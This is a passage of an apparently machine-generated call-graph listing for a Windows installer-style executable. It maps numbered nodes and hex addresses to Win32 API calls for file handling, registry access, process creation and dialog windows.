2655->2651 2656->2650 2657 405baa SHGetPathFromIDListA CoTaskMemFree 2656->2657 2657->2650 2664 405c7a 2658->2664 2659 405ce6 CharPrevA 2662 405ce2 2659->2662 2660 405cd7 CharNextA 2660->2662 2660->2664 2662->2659 2663 405d01 2662->2663 2663->2634 2664->2660 2664->2662 2665 405cc5 CharNextA 2664->2665 2666 405cd2 CharNextA 2664->2666 2675 40552a 2664->2675 2665->2664 2666->2660 2668 405964 2667->2668 2669 405926 RegQueryValueExA 2667->2669 2668->2650 2670 405947 RegCloseKey 2669->2670 2670->2668 2672->2651 2673->2651 2674->2641 2676 405530 2675->2676 2677 405543 2676->2677 2678 405536 CharNextA 2676->2678 2677->2664 2678->2676 2680 404dc5 2679->2680 2689 401431 ShellExecuteA 2679->2689 2681 404de2 lstrlenA 2680->2681 2682 405a2e 18 API calls 2680->2682 2683 404df0 lstrlenA 2681->2683 2684 404e0b 2681->2684 2682->2681 2685 404e02 lstrcatA 2683->2685 2683->2689 2686 404e11 SetWindowTextA 2684->2686 2687 404e1e 2684->2687 2685->2684 2686->2687 2688 404e24 SendMessageA SendMessageA SendMessageA 2687->2688 2687->2689 2688->2689 2689->2629 3187 401cc1 GetDlgItem GetClientRect 3188 4029f6 18 API calls 3187->3188 3189 401cf1 LoadImageA SendMessageA 3188->3189 3190 40288b 3189->3190 3191 401d0f DeleteObject 3189->3191 3191->3190 3192 401645 3193 4029f6 18 API calls 3192->3193 3194 40164c 3193->3194 3195 4029f6 18 API calls 3194->3195 3196 401655 3195->3196 3197 4029f6 18 API calls 3196->3197 3198 40165e MoveFileA 3197->3198 3199 401671 3198->3199 3200 40166a 3198->3200 3201 405d07 2 API calls 3199->3201 3204 402169 3199->3204 3202 401423 25 API calls 3200->3202 3203 401680 3201->3203 3202->3204 3203->3204 3205 40575a 38 API calls 3203->3205 3205->3200 3206 401ec5 3207 4029f6 18 API calls 3206->3207 3208 401ecc GetFileVersionInfoSizeA 3207->3208 3209 401eef GlobalAlloc 3208->3209 3216 401f45 3208->3216 3210 401f03 GetFileVersionInfoA 3209->3210 3209->3216 3211 401f14 VerQueryValueA 3210->3211 3210->3216 3212 401f2d 3211->3212 3211->3216 3217 40596a wsprintfA 3212->3217 3214 401f39 3218 40596a wsprintfA 3214->3218 3217->3214 3218->3216 3219 4014ca 3220 404daa 25 API calls 3219->3220 3221 4014d1 3220->3221 3222 4025cc 3223 4025d3 3222->3223 3229 402838 3222->3229 3230 4029d9 3223->3230 3225 4025de 3226 4025e5 SetFilePointer 3225->3226 3227 4025f5 3226->3227 3226->3229 3233 40596a wsprintfA 3227->3233 3231 405a2e 18 API calls 3230->3231 3232 4029ed 3231->3232 3232->3225 3233->3229 3234 401f51 3235 401f63 3234->3235 3236 402012 3234->3236 3237 4029f6 18 API calls 3235->3237 3239 401423 25 API calls 3236->3239 3238 401f6a 3237->3238 3240 4029f6 18 API calls 3238->3240 3244 402169 3239->3244 3241 401f73 3240->3241 3242 401f88 LoadLibraryExA 3241->3242 3243 401f7b GetModuleHandleA 3241->3243 3242->3236 3245 401f98 GetProcAddress 3242->3245 3243->3242 3243->3245 3246 401fe5 3245->3246 3247 401fa8 3245->3247 3248 404daa 25 API calls 3246->3248 3249 401423 25 API calls 3247->3249 3250 401fb8 3247->3250 3248->3250 3249->3250 3250->3244 3251 402006 FreeLibrary 3250->3251 3251->3244 3252 403ed2 lstrcpynA lstrlenA 3253 4014d6 3254 4029d9 18 API calls 3253->3254 3255 4014dc Sleep 3254->3255 3257 40288b 3255->3257 3263 4018d8 3264 40190f 3263->3264 3265 4029f6 18 API calls 3264->3265 3266 401914 3265->3266 3267 405331 68 API calls 3266->3267 3268 40191d 3267->3268 3269 4018db 3270 4029f6 18 API calls 3269->3270 3271 4018e2 3270->3271 3272 4052cd MessageBoxIndirectA 3271->3272 3273 4018eb 3272->3273 3274 401ae5 3275 4029f6 18 API calls 3274->3275 3276 401aec 3275->3276 3277 4029d9 18 API calls 3276->3277 3278 401af5 wsprintfA 3277->3278 3279 40288b 3278->3279 3280 402866 SendMessageA 3281 402880 InvalidateRect 3280->3281 3282 40288b 3280->3282 3281->3282 3283 4019e6 3284 4029f6 18 API calls 3283->3284 3285 4019ef ExpandEnvironmentStringsA 3284->3285 3286 401a03 3285->3286 3288 401a16 3285->3288 3287 401a08 lstrcmpA 3286->3287 3286->3288 3287->3288 3289 402267 3290 4029f6 18 API calls 3289->3290 3291 402275 3290->3291 3292 4029f6 18 API calls 3291->3292 3293 40227e 3292->3293 3294 4029f6 18 API calls 3293->3294 3295 402288 GetPrivateProfileStringA 3294->3295 3296 404ee8 3297 405094 3296->3297 3298 404f09 GetDlgItem GetDlgItem GetDlgItem 3296->3298 3299 4050c5 3297->3299 3300 40509d GetDlgItem CreateThread CloseHandle 3297->3300 3342 403df3 SendMessageA 3298->3342 3302 4050f0 3299->3302 3304 405112 3299->3304 3305 4050dc ShowWindow ShowWindow 3299->3305 3300->3299 3306 40514e 3302->3306 3309 405101 3302->3309 3310 405127 ShowWindow 3302->3310 3303 404f7a 3307 404f81 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3303->3307 3351 403e25 3304->3351 3347 403df3 SendMessageA 3305->3347 3306->3304 3314 405159 SendMessageA 3306->3314 3312 404ff0 3307->3312 3313 404fd4 SendMessageA SendMessageA 3307->3313 3348 403d97 3309->3348 3317 405147 3310->3317 3318 405139 3310->3318 3320 405003 3312->3320 3321 404ff5 SendMessageA 3312->3321 3313->3312 3316 405120 3314->3316 3322 405172 CreatePopupMenu 3314->3322 3319 403d97 SendMessageA 3317->3319 3323 404daa 25 API calls 3318->3323 3319->3306 3343 403dbe 3320->3343 3321->3320 3324 405a2e 18 API calls 3322->3324 3323->3317 3326 405182 AppendMenuA 3324->3326 3328 405195 GetWindowRect 3326->3328 3329 4051a8 3326->3329 3327 405013 3330 405050 GetDlgItem SendMessageA 3327->3330 3331 40501c ShowWindow 3327->3331 3332 4051b1 TrackPopupMenu 3328->3332 3329->3332 3330->3316 3335 405077 SendMessageA SendMessageA 3330->3335 3333 405032 ShowWindow 3331->3333 3334 40503f 3331->3334 3332->3316 3336 4051cf 3332->3336 3333->3334 3346 403df3 SendMessageA 3334->3346 3335->3316 3337 4051eb SendMessageA 3336->3337 3337->3337 3339 405208 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3337->3339 3340 40522a SendMessageA 3339->3340 3340->3340 3341 40524b GlobalUnlock SetClipboardData CloseClipboard 3340->3341 3341->3316 3342->3303 3344 405a2e 18 API calls 3343->3344 3345 403dc9 SetDlgItemTextA 3344->3345 3345->3327 3346->3330 3347->3302 3349 403da4 SendMessageA 3348->3349 3350 403d9e 3348->3350 3349->3304 3350->3349 3352 403e3d GetWindowLongA 3351->3352 3362 403ec6 3351->3362 3353 403e4e 3352->3353 3352->3362 3354 403e60 3353->3354 3355 403e5d GetSysColor 3353->3355 3356 403e70 SetBkMode 3354->3356 3357 403e66 SetTextColor 3354->3357 3355->3354 3358 403e88 GetSysColor 3356->3358 3359 403e8e 3356->3359 3357->3356 3358->3359 3360 403e95 SetBkColor 3359->3360 3361 403e9f 3359->3361 3360->3361 3361->3362 3363 403eb2 DeleteObject 3361->3363 3364 403eb9 CreateBrushIndirect 3361->3364 3362->3316 3363->3364 3364->3362 3365 4038eb 3366 403903 3365->3366 3367 403a3e 3365->3367 3366->3367 3368 40390f 3366->3368 3369 403a8f 3367->3369 3370 403a4f GetDlgItem GetDlgItem 3367->3370 3371 40391a SetWindowPos 3368->3371 3372 40392d 3368->3372 3374 403ae9 3369->3374 3382 401389 2 API calls 3369->3382 3373 403dbe 19 API calls 3370->3373 3371->3372 3376 403932 ShowWindow 3372->3376 3377 40394a 3372->3377 3378 403a79 SetClassLongA 3373->3378 3375 403e0a SendMessageA 3374->3375 3425 403a39 3374->3425 3423 403afb 3375->3423 3376->3377 3379 403952 DestroyWindow 3377->3379 3380 40396c 3377->3380 3381 40140b 2 API calls 3378->3381 3386 403d47 3379->3386 3383 403971 SetWindowLongA 3380->3383 3384 403982 3380->3384 3381->3369 3385 403ac1 3382->3385 3383->3425 3389 4039f9 3384->3389 3390 40398e GetDlgItem 3384->3390 3385->3374 3391 403ac5 SendMessageA 3385->3391 3393 403d78 ShowWindow 3386->3393 3386->3425 3387 40140b 2 API calls 3387->3423 3388 403d49 DestroyWindow EndDialog 3388->3386 3392 403e25 8 API calls 3389->3392 3394 4039a1 SendMessageA IsWindowEnabled 3390->3394 3395 4039be 3390->3395 3391->3425 3392->3425 3393->3425 3394->3395 3394->3425 3397 4039cb 3395->3397 3398 403a12 SendMessageA 3395->3398 3399 4039de 3395->3399 3406 4039c3 3395->3406 3396 405a2e 18 API calls 3396->3423 3397->3398 3397->3406 3398->3389 3401 4039e6 3399->3401 3402 4039fb 3399->3402 3400 403d97 SendMessageA 3400->3389 3403 40140b 2 API calls 3401->3403 3404 40140b 2 API calls 3402->3404 3403->3406 3404->3406 3405 403dbe 19 API calls 3405->3423 3406->3389 3406->3400 3407 403dbe 19 API calls 3408 403b76 GetDlgItem 3407->3408 3409 403b93 ShowWindow EnableWindow 3408->3409 3410 403b8b 3408->3410 3433 403de0 EnableWindow 3409->3433 3410->3409 3412 403bbd EnableWindow 3415 403bd1 3412->3415 3413 403bd6 GetSystemMenu EnableMenuItem SendMessageA 3414 403c06 SendMessageA 3413->3414 3413->3415 3414->3415 3415->3413 3434 403df3 SendMessageA 3415->3434 3435 405a0c lstrcpynA 3415->3435 3418 403c34 lstrlenA 3419 405a2e 18 API calls 3418->3419 3420 403c45 SetWindowTextA 3419->3420 3421 401389 2 API calls 3420->3421 3421->3423 3422 403c89 DestroyWindow 3422->3386 3424 403ca3 CreateDialogParamA 3422->3424 3423->3387 3423->3388 3423->3396 3423->3405 3423->3407 3423->3422 3423->3425 3424->3386 3426 403cd6 3424->3426 3427 403dbe 19 API calls 3426->3427 3428 403ce1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3427->3428 3429 401389 2 API calls 3428->3429 3430 403d27 3429->3430 3430->3425 3431 403d2f ShowWindow 3430->3431 3432 403e0a SendMessageA 3431->3432 3432->3386 3433->3412 3434->3415 3435->3418 3436 401c6d 3437 4029d9 18 API calls 3436->3437 3438 401c73 IsWindow 3437->3438 3439 4019d6 3438->3439 3440 4014f0 SetForegroundWindow 3441 40288b 3440->3441 3442 402172 3443 4029f6 18 API calls 3442->3443 3444 402178 3443->3444 3445 4029f6 18 API calls 3444->3445 3446 402181 3445->3446 3447 4029f6 18 API calls 3446->3447 3448 40218a 3447->3448 3449 405d07 2 API calls 3448->3449 3450 402193 3449->3450 3451 4021a4 lstrlenA lstrlenA 3450->3451 3455 402197 3450->3455 3453 404daa 25 API calls 3451->3453 3452 404daa 25 API calls 3456 40219f 3452->3456 3454 4021e0 SHFileOperationA 3453->3454 3454->3455 3454->3456 3455->3452 3455->3456 3457 4021f4 3458 4021fb 3457->3458 3461 40220e 3457->3461 3459 405a2e 18 API calls 3458->3459 3460 402208 3459->3460 3462 4052cd MessageBoxIndirectA 3460->3462 3462->3461 3463 4046f9 GetDlgItem GetDlgItem 3464 40474d 7 API calls 3463->3464 3476 40496a 3463->3476 3465 4047f3 DeleteObject 3464->3465 3466 4047e6 SendMessageA 3464->3466 3467 4047fe 3465->3467 3466->3465 3469 404835 3467->3469 3470 405a2e 18 API calls 3467->3470 3468 404a54 3472 404b03 3468->3472 3478 40495d 3468->3478 3483 404aad SendMessageA 3468->3483 3471 403dbe 19 API calls 3469->3471 3473 404817 SendMessageA SendMessageA 3470->3473 3477 404849 3471->3477 3474 404b18 3472->3474 3475 404b0c SendMessageA 3472->3475 3473->3467 3485 404b31 3474->3485 3486 404b2a ImageList_Destroy 3474->3486 3493 404b41 3474->3493 3475->3474 3476->3468 3497 4049de 3476->3497 3516 404679 SendMessageA 3476->3516 3482 403dbe 19 API calls 3477->3482 3479 403e25 8 API calls 3478->3479 3484 404cf3 3479->3484 3480 404a46 SendMessageA 3480->3468 3498 404857 3482->3498 3483->3478 3488 404ac2 SendMessageA 3483->3488 3489 404b3a GlobalFree 3485->3489 3485->3493 3486->3485 3487 404ca7 3487->3478 3494 404cb9 ShowWindow GetDlgItem ShowWindow 3487->3494 3491 404ad5 3488->3491 3489->3493 3490 40492b GetWindowLongA SetWindowLongA 3492 404944 3490->3492 3500 404ae6 SendMessageA 3491->3500 3495 404962 3492->3495 3496 40494a ShowWindow 3492->3496 3493->3487 3499 40140b 2 API calls 3493->3499 3510 404b73 3493->3510 3494->3478 3515 403df3 SendMessageA 3495->3515 3514 403df3 SendMessageA 3496->3514 3497->3468 3497->3480 3498->3490 3501 404925 3498->3501 3504 4048a6 SendMessageA 3498->3504 3505 4048e2 SendMessageA 3498->3505 3506 4048f3 SendMessageA 3498->3506 3499->3510 3500->3472 3501->3490 3501->3492 3504->3498 3505->3498 3506->3498 3507 404c7d InvalidateRect 3507->3487 3508 404c93 3507->3508 3521 404597 3508->3521 3509 404ba1 SendMessageA 3511 404bb7 3509->3511 3510->3509 3510->3511 3511->3507 3513 404c2b SendMessageA SendMessageA 3511->3513 3513->3511 3514->3478 3515->3476 3517 4046d8 SendMessageA 3516->3517 3518 40469c GetMessagePos ScreenToClient SendMessageA 3516->3518 3520 4046d0 3517->3520 3519 4046d5 3518->3519 3518->3520 3519->3517 3520->3497 3522 4045b1 3521->3522 3523 405a2e 18 API calls 3522->3523 3524 4045e6 3523->3524 3525 405a2e 18 API calls 3524->3525 3526 4045f1 3525->3526 3527 405a2e 18 API calls 3526->3527 3528 404622 lstrlenA wsprintfA SetDlgItemTextA 3527->3528 3528->3487 2835 4030fa #17 SetErrorMode OleInitialize 2905 405d2e GetModuleHandleA 2835->2905 2839 403168 GetCommandLineA 2910 405a0c lstrcpynA 2839->2910 2841 40317a GetModuleHandleA 2842 403191 2841->2842 2843 40552a CharNextA 2842->2843 2844 4031a5 CharNextA 2843->2844 2849 4031b2 2844->2849 2845 40321b 2846 40322e GetTempPathA 2845->2846 2911 4030c6 2846->2911 2848 403244 2850 403268 DeleteFileA 2848->2850 2851 403248 GetWindowsDirectoryA lstrcatA 2848->2851 2849->2845 2852 40552a CharNextA 2849->2852 2856 40321d 2849->2856 2919 402c22 GetTickCount GetModuleFileNameA 2850->2919 2853 4030c6 11 API calls 2851->2853 2852->2849 2855 403264 2853->2855 2855->2850 2859 4032e6 ExitProcess OleUninitialize 2855->2859 2947 405a0c lstrcpynA 2856->2947 2857 403279 2857->2859 2860 4032d2 2857->2860 2866 40552a CharNextA 2857->2866 2861 4033e0 2859->2861 2862 4032fb 2859->2862 2964 403555 2860->2964 2864 403463 ExitProcess 2861->2864 2868 405d2e 3 API calls 2861->2868 2863 4052cd MessageBoxIndirectA 2862->2863 2867 403309 ExitProcess 2863->2867 2871 403290 2866->2871 2872 4033ef 2868->2872 2869 4032e2 2869->2859 2874 403311 lstrcatA lstrcmpiA 2871->2874 2875 4032ad 2871->2875 2873 405d2e 3 API calls 2872->2873 2876 4033f8 2873->2876 2874->2859 2877 40332d CreateDirectoryA SetCurrentDirectoryA 2874->2877 2948 4055e0 2875->2948 2879 405d2e 3 API calls 2876->2879 2881 403344 2877->2881 2882 40334f 2877->2882 2880 403401 2879->2880 2884 40344f ExitWindowsEx 2880->2884 2890 40340f GetCurrentProcess 2880->2890 3018 405a0c lstrcpynA 2881->3018 3019 405a0c lstrcpynA 2882->3019 2884->2864 2889 40345c 2884->2889 2886 4032bc 2962 405a0c lstrcpynA 2886->2962 3049 40140b 2889->3049 2895 40341f 2890->2895 2891 4032c7 2963 405a0c lstrcpynA 2891->2963 2894 405a2e 18 API calls 2896 40337f DeleteFileA 2894->2896 2895->2884 2897 40338c CopyFileA 2896->2897 2902 40335d 2896->2902 2897->2902 2898 4033d4 2899 40575a 38 API calls 2898->2899 2899->2869 2901 405a2e 18 API calls 2901->2902 2902->2894 2902->2898 2902->2901 2904 4033c0 CloseHandle 2902->2904 3020 40575a 2902->3020 3046 40526c CreateProcessA 2902->3046 2904->2902 2906 405d55 GetProcAddress 2905->2906 2907 405d4a LoadLibraryA 2905->2907 2908 40313d SHGetFileInfoA 2906->2908 2907->2906 2907->2908 2909 405a0c lstrcpynA 2908->2909 2909->2839 2910->2841 2912 405c6e 5 API calls 2911->2912 2913 4030d2 2912->2913 2914 4030dc 2913->2914 2915 4054ff 3 API calls 2913->2915 2914->2848 2916 4030e4 CreateDirectoryA 2915->2916 2917 405712 2 API calls 2916->2917 2918 4030f8 2917->2918 2918->2848 3052 4056e3 GetFileAttributesA CreateFileA 2919->3052 2921 402c62 2942 402c72 2921->2942 3053 405a0c lstrcpynA 2921->3053 2923 402c88 3054 405546 lstrlenA 2923->3054 2927 402c99 GetFileSize 2928 402d95 2927->2928 2940 402cb0 2927->2940 3059 402bbe 2928->3059 2930 402d9e 2932 402dce GlobalAlloc 2930->2932 2930->2942 3071 4030af SetFilePointer 2930->3071 2931 40307d ReadFile 2931->2940 3070 4030af SetFilePointer 2932->3070 2934 402e01 2938 402bbe 6 API calls 2934->2938 2936 402db7 2939 40307d ReadFile 2936->2939 2937 402de9 2941 402e5b 33 API calls 2937->2941 2938->2942 2943 402dc2 2939->2943 2940->2928 2940->2931 2940->2934 2940->2942 2944 402bbe 6 API calls 2940->2944 2945 402df5 2941->2945 2942->2857 2943->2932 2943->2942 2944->2940 2945->2942 2945->2945 2946 402e32 SetFilePointer 2945->2946 2946->2942 2947->2846 3076 405a0c lstrcpynA 2948->3076 2950 4055f1 2951 405593 4 API calls 2950->2951 2952 4055f7 2951->2952 2953 4032b8 2952->2953 2954 405c6e 5 API calls 2952->2954 2953->2859 2953->2886 2960 405607 2954->2960 2955 405632 lstrlenA 2956 40563d 2955->2956 2955->2960 2958 4054ff 3 API calls 2956->2958 2957 405d07 2 API calls 2957->2960 2959 405642 GetFileAttributesA 2958->2959 2959->2953 2960->2953 2960->2955 2960->2957 2961 405546 2 API calls 2960->2961 2961->2955 2962->2891 2963->2860 2965 405d2e 3 API calls 2964->2965 2966 403569 2965->2966 2967 403581 2966->2967 2968 40356f 2966->2968 2969 4058f3 3 API calls 2967->2969 3077 40596a wsprintfA 2968->3077 2970 4035a2 2969->2970 2972 4035c0 lstrcatA 2970->2972 2974 4058f3 3 API calls 2970->2974 2973 40357f 2972->2973 3078 40381e 2973->3078 2974->2972 2977 4055e0 18 API calls 2978 4035f2 2977->2978 2979 40367b 2978->2979 2981 4058f3 3 API calls 2978->2981 2980 4055e0 18 API calls 2979->2980 2982 403681 2980->2982 2983 40361e 2981->2983 2984 403691 LoadImageA 2982->2984 2985 405a2e 18 API calls 2982->2985 2983->2979 2988 40363a lstrlenA 2983->2988 2992 40552a CharNextA 2983->2992 2986 403745 2984->2986 2987 4036bc RegisterClassA 2984->2987 2985->2984 2991 40140b 2 API calls 2986->2991 2989 40374f 2987->2989 2990 4036f8 SystemParametersInfoA CreateWindowExA 2987->2990 2993 403648 lstrcmpiA 2988->2993 2994 40366e 2988->2994 2989->2869 2990->2986 2995 40374b 2991->2995 2997 403638 2992->2997 2993->2994 2998 403658 GetFileAttributesA 2993->2998 2996 4054ff 3 API calls 2994->2996 2995->2989 2999 40381e 19 API calls 2995->2999 3000 403674 2996->3000 2997->2988 3001 403664 2998->3001 3002 40375c 2999->3002 3087 405a0c lstrcpynA 3000->3087 3001->2994 3004 405546 2 API calls 3001->3004 3005 403768 ShowWindow LoadLibraryA 3002->3005 3006 4037eb 3002->3006 3004->2994 3007 403787 LoadLibraryA 3005->3007 3008 40378e GetClassInfoA 3005->3008 3088 404e7c OleInitialize 3006->3088 3007->3008 3010 4037a2 GetClassInfoA RegisterClassA 3008->3010 3011 4037b8 DialogBoxParamA 3008->3011 3010->3011 3013 40140b 2 API calls 3011->3013 3012 4037f1 3014 40380d 3012->3014 3016 4037f5 3012->3016 3013->2989 3015 40140b 2 API calls 3014->3015 3015->2989 3016->2989 3017 40140b 2 API calls 3016->3017 3017->2989 3018->2882 3019->2902 3021 405d2e 3 API calls 3020->3021 3022 405765 3021->3022 3023 4057c2 GetShortPathNameA 3022->3023 3026 4058b7 3022->3026 3103 4056e3 GetFileAttributesA CreateFileA 3022->3103 3025 4057d7 3023->3025 3023->3026 3025->3026 3028 4057df wsprintfA 3025->3028 3026->2902 3027 4057a6 CloseHandle GetShortPathNameA 3027->3026 3029 4057ba 3027->3029 3030 405a2e 18 API calls 3028->3030 3029->3023 3029->3026 3031 405807 3030->3031 3104 4056e3 GetFileAttributesA CreateFileA 3031->3104 3033 405814 3033->3026 3034 405823 GetFileSize GlobalAlloc 3033->3034 3035 4058b0 CloseHandle 3034->3035 3036 405841 ReadFile 3034->3036 3035->3026 3036->3035 3037 405855 3036->3037 3037->3035 3105 405658 lstrlenA 3037->3105 3040 4058c4 3043 405658 4 API calls 3040->3043 3041 40586a 3110 405a0c lstrcpynA 3041->3110 3044 405878 3043->3044 3045 40588b SetFilePointer WriteFile GlobalFree 3044->3045 3045->3035 3047 4052a7 3046->3047 3048 40529b CloseHandle 3046->3048 3047->2902 3048->3047 3050 401389 2 API calls 3049->3050 3051 401420 3050->3051 3051->2864 3052->2921 3053->2923 3055 405553 3054->3055 3056 402c8e 3055->3056 3057 405558 CharPrevA 3055->3057 3058 405a0c lstrcpynA 3056->3058 3057->3055 3057->3056 3058->2927 3060 402bc7 3059->3060 3061 402bdf 3059->3061 3062 402bd0 DestroyWindow 3060->3062 3063 402bd7 3060->3063 3064 402be7 3061->3064 3065 402bef GetTickCount 3061->3065 3062->3063 3063->2930 3072 405d67 3064->3072 3067 402c20 3065->3067 3068 402bfd CreateDialogParamA ShowWindow 3065->3068 3067->2930 3068->3067 3070->2937 3071->2936 3073 405d84 PeekMessageA 3072->3073 3074 402bed 3073->3074 3075 405d7a DispatchMessageA 3073->3075 3074->2930 3075->3073 3076->2950 3077->2973 3079 403832 3078->3079 3095 40596a wsprintfA 3079->3095 3081 4038a3 3082 405a2e 18 API calls 3081->3082 3083 4038af SetWindowTextA 3082->3083 3084 4035d0 3083->3084 3085 4038cb 3083->3085 3084->2977 3085->3084 3086 405a2e 18 API calls 3085->3086 3086->3085 3087->2979 3096 403e0a 3088->3096 3090 404e9f 3094 404ec6 3090->3094 3099 401389 3090->3099 3091 403e0a SendMessageA 3092 404ed8 OleUninitialize 3091->3092 3092->3012 3094->3091 3095->3081 3097 403e22 3096->3097 3098 403e13 SendMessageA 3096->3098 3097->3090 3098->3097 3101 401390 3099->3101 3100 4013fe 3100->3090 3101->3100 3102 4013cb MulDiv SendMessageA 3101->3102 3102->3101 3103->3027 3104->3033 3106 40568e lstrlenA 3105->3106 3107 405698 3106->3107 3108 40566c lstrcmpiA 3106->3108 3107->3040 3107->3041 3108->3107 3109 405685 CharNextA 3108->3109 3109->3106 3110->3044 3529 404cfa 3530 404d08 3529->3530 3531 404d1f 3529->3531 3532 404d0e 3530->3532 3547 404d88 3530->3547 3533 404d2d IsWindowVisible 3531->3533 3539 404d44 3531->3539 3534 403e0a SendMessageA 3532->3534 3536 404d3a 3533->3536 3533->3547 3537 404d18 3534->3537 3535 404d8e CallWindowProcA 3535->3537 3538 404679 5 API calls 3536->3538 3538->3539 3539->3535 3548 405a0c lstrcpynA 3539->3548 3541 404d73 3549 40596a wsprintfA 3541->3549 3543 404d7a 3544 40140b 2 API calls 3543->3544 3545 404d81 3544->3545 3550 405a0c lstrcpynA 3545->3550 3547->3535 3548->3541 3549->3543 3550->3547 3551 4016fa 3552 4029f6 18 API calls 3551->3552 3553 401701 SearchPathA 3552->3553 3554 40171c 3553->3554 3111 40347b 3112 403493 3111->3112 3113 403485 CloseHandle 3111->3113 3118 4034c0 3112->3118 3113->3112 3119 4034ce 3118->3119 3120 4034d3 FreeLibrary GlobalFree 3119->3120 3121 403498 3119->3121 3120->3120 3120->3121 3122 405331 3121->3122 3123 4055e0 18 API calls 3122->3123 3124 405345 3123->3124 3125 405365 3124->3125 3126 40534e DeleteFileA 3124->3126 3128 40549a 3125->3128 3163 405a0c lstrcpynA 3125->3163 3127 4034a4 3126->3127 3128->3127 3133 405d07 2 API calls 3128->3133 3130 40538f 3131 4053a0 3130->3131 3132 405393 lstrcatA 3130->3132 3135 405546 2 API calls 3131->3135 3134 4053a6 3132->3134 3137 4054bf 3133->3137 3136 4053b4 lstrcatA 3134->3136 3138 4053bf lstrlenA FindFirstFileA 3134->3138 3135->3134 3136->3138 3137->3127 3139 4054c3 3137->3139 3138->3128 3144 4053e3 3138->3144 3140 4054ff 3 API calls 3139->3140 3142 4054c9 3140->3142 3141 40552a CharNextA 3141->3144 3143 4056c4 2 API calls 3142->3143 3145 4054cf RemoveDirectoryA 3143->3145 3144->3141 3149 405479 FindNextFileA 3144->3149 3154 405435 3144->3154 3164 405a0c lstrcpynA 3144->3164 3146 4054f1 3145->3146 3147 4054da 3145->3147 3148 404daa 25 API calls 3146->3148 3147->3127 3152 404daa 25 API calls 3147->3152 3148->3127 3149->3144 3151 405491 FindClose 3149->3151 3151->3128 3153 4054e8 3152->3153 3155 40575a 38 API calls 3153->3155 3154->3149 3156 4056c4 2 API calls 3154->3156 3157 405331 59 API calls 3154->3157 3160 404daa 25 API calls 3154->3160 3161 404daa 25 API calls 3154->3161 3162 40575a 38 API calls 3154->3162 3158 4054ef 3155->3158 3159 405446 DeleteFileA 3156->3159 3157->3154 3158->3127 3159->3154 3160->3149 3161->3154 3162->3154 3163->3130 3164->3144 3555 4025fb 3556 402602 3555->3556 3557 40288b 3555->3557 3558 402608 FindClose 3556->3558 3558->3557 3559 40267c 3560 4029f6 18 API calls 3559->3560 3562 40268a 3560->3562 3561 4026a0 3564 4056c4 2 API calls 3561->3564 3562->3561 3563 4029f6 18 API calls 3562->3563 3563->3561 3565 4026a6 3564->3565 3585 4056e3 GetFileAttributesA CreateFileA 3565->3585 3567 4026b3 3568 40275c 3567->3568 3569 4026bf GlobalAlloc 3567->3569 3572 402764 DeleteFileA 3568->3572 3573 402777 3568->3573 3570 402753 CloseHandle 3569->3570 3571 4026d8 3569->3571 3570->3568 3586 4030af SetFilePointer 3571->3586 3572->3573 3575 4026de 3576 40307d ReadFile 3575->3576 3577 4026e7 GlobalAlloc 3576->3577 3578 4026f7 3577->3578 3579 40272b WriteFile GlobalFree 3577->3579 3580 402e5b 33 API calls 3578->3580 3581 402e5b 33 API calls 3579->3581 3584 402704 3580->3584 3582 402750 3581->3582 3582->3570 3583 402722 GlobalFree 3583->3579 3584->3583 3585->3567 3586->3575 3587 4041fc 3588 40423a 3587->3588 3589 40422d 3587->3589 3591 404243 GetDlgItem 3588->3591 3596 4042a6 3588->3596 3648 4052b1 GetDlgItemTextA 3589->3648 3593 404257 3591->3593 3592 404234 3595 405c6e 5 API calls 3592->3595 3598 40426b SetWindowTextA 3593->3598 3604 405593 4 API calls 3593->3604 3594 40438a 3599 404516 3594->3599 3650 4052b1 GetDlgItemTextA 3594->3650 3595->3588 3596->3594 3596->3599 3600 405a2e 18 API calls 3596->3600 3602 403dbe 19 API calls 3598->3602 3603 403e25 8 API calls 3599->3603 3605 40431c SHBrowseForFolderA 3600->3605 3601 4043b6 3606 4055e0 18 API calls 3601->3606 3607 404289 3602->3607 3608 40452a 3603->3608 3609 404261 3604->3609 3605->3594 3610 404334 CoTaskMemFree 3605->3610 3611 4043bc 3606->3611 3612 403dbe 19 API calls 3607->3612 3609->3598 3615 4054ff 3 API calls 3609->3615 3613 4054ff 3 API calls 3610->3613 3651 405a0c lstrcpynA 3611->3651 3614 404297 3612->3614 3616 404341 3613->3616 3649 403df3 SendMessageA 3614->3649 3615->3598 3619 404378 SetDlgItemTextA 3616->3619 3624 405a2e 18 API calls 3616->3624 3619->3594 3620 40429f 3622 405d2e 3 API calls 3620->3622 3621 4043d3 3623 405d2e 3 API calls 3621->3623 3622->3596 3631 4043db 3623->3631 3625 404360 lstrcmpiA 3624->3625 3625->3619 3628 404371 lstrcatA 3625->3628 3626 404415 3652 405a0c lstrcpynA 3626->3652 3628->3619 3629 40441e 3630 405593 4 API calls 3629->3630 3632 404424 GetDiskFreeSpaceA 3630->3632 3631->3626 3634 405546 2 API calls 3631->3634 3636 404468 3631->3636 3635 404446 MulDiv 3632->3635 3632->3636 3634->3631 3635->3636 3637 4044c5 3636->3637 3638 404597 21 API calls 3636->3638 3639 4044e8 3637->3639 3641 40140b 2 API calls 3637->3641 3640 4044b7 3638->3640 3653 403de0 EnableWindow 3639->3653 3643 4044c7 SetDlgItemTextA 3640->3643 3644 4044bc 3640->3644 3641->3639 3643->3637 3646 404597 21 API calls 3644->3646 3645 404504 3645->3599 3654 404191 3645->3654 3646->3637 3648->3592 3649->3620 3650->3601 3651->3621 3652->3629 3653->3645 3655 4041a4 SendMessageA 3654->3655 3656 40419f 3654->3656 3655->3599 3656->3655 3657 4014fe 3658 401506 3657->3658 3660 401519 3657->3660 3659 4029d9 18 API calls 3658->3659 3659->3660 3661 401000 3662 401037 BeginPaint GetClientRect 3661->3662 3663 40100c DefWindowProcA 3661->3663 3665 4010f3 3662->3665 3666 401179 3663->3666 3667 401073 CreateBrushIndirect FillRect DeleteObject 3665->3667 3668 4010fc 3665->3668 3667->3665 3669 401102 CreateFontIndirectA 3668->3669 3670 401167 EndPaint 3668->3670 3669->3670 3671 401112 6 API calls 3669->3671 3670->3666 3671->3670 3672 402303 3673 402309 3672->3673 3674 4029f6 18 API calls 3673->3674 3675 40231b 3674->3675 3676 4029f6 18 API calls 3675->3676 3677 402325 RegCreateKeyExA 3676->3677 3678 40288b 3677->3678 3679 40234f 3677->3679 3680 402367 3679->3680 3681 4029f6 18 API calls 3679->3681 3682 402373 3680->3682 3685 4029d9 18 API calls 3680->3685 3684 